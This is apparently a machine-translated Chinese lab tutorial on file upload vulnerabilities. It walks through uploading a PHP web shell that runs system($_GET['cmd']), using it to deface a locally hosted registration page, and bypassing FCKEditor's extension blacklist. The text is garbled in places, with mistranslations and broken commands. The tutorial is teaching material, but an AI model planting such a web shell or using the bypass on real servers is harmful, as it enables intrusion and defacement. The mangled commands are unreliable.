File upload vulnerability example analysis-vulnerability warning-the black bar safety net

ID MYHACK58:62201671915
Type myhack58
Reporter 佚名
Modified 2016-02-22T00:00:00



File upload is a Web application that often appear in the function,it allows users to upload files to the server and saved to a specific location. This security is a very sensitive issue, once the malicious program is uploaded to the server and get the Execute permission, the consequences will be dire. So the vast majority of Web applications are on the file upload feature has many limitations. File upload vulnerability means attackers use a bug to bypass the system for File Validation and processing strategy of the malicious program uploaded to the server and get executed server-side command ability. This attack is direct and effective in dealing with certain vulnerable system even when there is no threshold.

File upload vulnerabilities in common use are: Upload Web script, the Web container explain the execution of uploaded malicious scripts. 上传 Flash 跨 域 策略 文件 crossdomain.xml to modify the access permissions(other policy file use a way similar). Upload viruses, Trojan files, trick users and administrators download perform. Upload contains the script of the picture, some browser of a lower version will execute the script, for fishing and fraud. In General,use the Upload file either with executable(malicious program),or have an impact on server capacity to act(a configuration file). In order to achieve an attack on the use of,the following conditions must be met:

File through the front end and the rear end of the filter and file processing. The file contents will not be changed,can be properly stored The storage location is in the Web container of the control range The attacker reserves the right to limit access to the storage directory

We experimentally demonstrate the use of methods A, contains the following material: regist folder loopholes in the eb app hacker.php to upload malicious scripts hacked.html (the Black page to be replaced by a new page)

Use the following command to download the experimental materials to the virtual machine to any directory and unzip.

wget <> -xzf stuffs. tar. gzcd stuffs 1. Deploy the web application

The regist folder copy to/var/www/html/directory

sudo cp-R regist /var/www/html/

regist folder of the directory structure is as follows index.html (front-end registration page) regist.php (the backend registration processing program) upload/ (File Upload Directory) css/ (style file directory) fonts/ (font-file directory) js/ (script file directory)

Modify the directory permissions:

sudo chmod 7 7 7 /var/www/html/regist-R Start the Apache2 service

sudo service apache2 start


  1. Upload a malicious script program


This is a common new user registration page,we feel free to fill out the registration information. We note that,although this page is for the user to input text information to have a more careful check,but did not uploaded an avatar of the type of strict check,this is very dangerous behavior. In the upload an avatar at the choice of pre-prepared malicious PHP program hacker. php. The confirmation,click registration. (用 同样 的 方法 上传 hacked.html)

  1. To access the script program

Through the directory structure to know the upload after the file is stored in the upload/Directory. Upload the PHP file through the browser address bar enter http://localhost/regist/upload/hacker. php access

hacker. php source code is as follows:

<body><p>cmd:<? phpecho $_GET['cmd'];?& gt;</p><p>result:<br><? php system($_GET['cmd']);?& gt;</p></body>

In fact,you can in the script file to write any you like the code,as long as configured properly and capable of being smoothly performed.

The core Code of the system($_GET['cmd']);to call php system function system to execute linux system commands,commands from a GET request in the cmd parameter acquisition. This means that we can in the current user privileges to execute arbitrary linux commands,just like the operation of the local computer. The first test of malicious programs can run properly:



To run successfully,this also means that the back-end is responsible for the upload function of the program module is not uploading file to do effective filtering and processing. Next,we use the upload hacke. html page to replace the homepage:

http://localhost/regist/upload/hacker.php?cmd=mv hacked.html ../index.html

Again to access the Web application localhost/regist,refresh the page,find the replacement is successful,the page displays"You Are Hacked".

Note that this needs to be hacked. html uploaded to the /upload Directory


Thinking and extension 1. Type checking Experimental procedure in the website front-end part is not on the file upload to do effective filtering and processing,similar to the famous vulnerability and FCKEditor file upload vulnerability,FCKEditor is a very popular Rich Text Editor, a PHP version out of a file upload type check vulnerability,the relevant code is as follows:

$Config['AllowdExtensions']['File'] = array();//allowed upload types$Config['DenedExtensions']['File'] =array('php', 'php3', 'php5', 'phtml', 'asp', 'aspx', 'ascx', 'jsp', 'cfm', 'cfc', 'pl','pl','bat', 'exe', 'dll', 'reg', 'cgi' );//disable the upload type You can see,the code for the file types were checked, but uses a blacklist approach, so if we use php2, inc such as the type name when it can by type-checked. In addition,for front-end verification,in the normal case can be modified or forged POST pack to get around. !

  1. Permissions needs In order to achieve the attack effect,the experimental procedure simplifies some of the complex details. Some key steps are related to the operation permissions. Step corresponding to the required permissions the following table:

Steps or operating authority requirements

[1] [2] next